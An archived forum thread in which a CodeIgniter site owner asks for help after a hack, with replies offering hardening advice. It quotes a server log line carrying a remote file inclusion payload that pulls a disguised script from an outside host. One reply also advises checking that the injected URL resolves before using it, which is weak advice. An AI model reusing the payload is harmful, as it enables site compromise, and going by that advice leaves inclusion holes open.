Help! My Codeigniter site was hacked

#1
[eluser]gfields[/eluser]
Hi guys,
my website, based on codeigntier 1.7.2, was hacked again with php injection.
They modified the htaccess file to redirect every request to another file (common.php).

My host service sent me this line of server log, that seems to hold the responsible of the
attack: GET /products/getprod/5/index.php?option=com_advertising&controller=http://werisetogether.org//wp-content/themes/canvas/cache/task.jpg? HTTP/1.1" 200 14501 "-" "libwww-perl/5.805"

How can I avoid this kind of attack?

Thanks for your help

Gabriele

#2
[eluser]PhilTem[/eluser]
Your .htaccess was hacked with an PHP Injection? Wow, that sounds pretty awesome of the hackers. Kudos to the hackers.

But anyway, I think you can avoid such things with two easy things:

First, fix the permissions of your files. Usually your webserver runs with a different username than you might want to create/store the files with. So you can easily modify the file permissions to allow editing only by the owner but executing by everyone.

Second, always keep your CI version up-to-date. The most recent, stable, and secure "build" is v2.1.2. You're still one major version behind which is probably the most vulnerable point of your site.

And maybe a third one as well: If you got proper code that is has lots of unit-testing it shouldn't be a problem at all. And don't forget one golden rule of development:

Never trust user input

#3
[eluser]gfields[/eluser]
Thank you PhilTem, I'll follow your golden rules but - more specifically - is it possible to avoid that, simply appending code to the uri, someone can cause all these troubles?

I found this code to put in the htaccess file:

RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC]
RewriteRule ^ - [F]

What do you think? Can it be useful?

ps: ok, it's not php injection but how can i call it? htaccess injection? Smile

#4
[eluser]PhilTem[/eluser]
If anyone appends anything to the URI, it should first of all never be a problem as long as you don't evaluate it. I could add some URI-arguments to the URI of these forums, nothing should happen as long as I don't get some specific trigger (Just tried to do codeigniter.com/index.php?c=forums&m=viewthread and got a 404, just to show you what I mean Wink)

Googleing a little on your problem taught me some things about PHP injection that I didn't know before.
In particular, I had a closer look at these two pages
http://isc.sans.edu/diary.html?storyid=9478
http://www.v-nessa.net/2006/12/30/php-in...or-dummies

This might help you as well understanding the dangers of PHP injection.

On your htaccess-code: I'm not that familiar with RewriteConditions but from what I know about it your code looks good and should hopefully prevent any further hacks.

Maybe you should also put a security check on the controller argument in your URI and first see if it is a valid URL (i.e. resolving to a server) before working with that argument.


Digg   Delicious   Reddit   Facebook   Twitter   StumbleUpon  


  Theme © 2014 iAndrew  
Powered By MyBB, © 2002-2020 MyBB Group.